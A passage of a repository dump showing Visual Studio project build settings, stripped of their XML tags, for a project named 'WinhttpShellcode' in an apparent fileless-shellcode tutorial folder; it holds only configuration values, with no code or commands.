129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------
/4 - Fileless Shellcode/2 - Using WinHttp/WinhttpShellcode/WinhttpShellcode.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 | 16.0
23 | Win32Proj
24 | {9aa32bbf-90f3-4ce6-b210-cbcdb85052b0}
25 | WinhttpShellcode
26 | 10.0
27 |
28 |
29 |
30 | Application
31 | true
32 | v142
33 | Unicode
34 |
35 |
36 | Application
37 | false
38 | v142
39 | true
40 | Unicode
41 |
42 |
43 | Application
44 | true
45 | v142
46 | Unicode
47 |
48 |
49 | Application
50 | false
51 | v142
52 | true
53 | Unicode
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 | true
75 |
76 |
77 | false
78 |
79 |
80 | true
81 |
82 |
83 | false
84 |
85 |
86 |
87 | Level3
88 | true
89 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
90 | true
91 |
92 |
93 | Console
94 | true
95 |
96 |
97 |
98 |
99 | Level3
100 | true
101 | true
102 | true
103 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
104 | true
105 |
106 |
107 | Console
108 | true
109 | true
110 | true
111 |
112 |
113 |
114 |
115 | Level3
116 | true
117 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
118 | true
119 |
120 |
121 | Console
122 | true
123 |
124 |
125 |
126 |
127 | Level3
128 | true
129 | true
130 | true
131 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
132 | true
133 |
134 |
135 | Console
136 | true
137 | true
138 | true
139 |
140 |
141 |
142 |
143 |
144 |
145 |
146 |
147 |
--------------------------------------------------------------------------------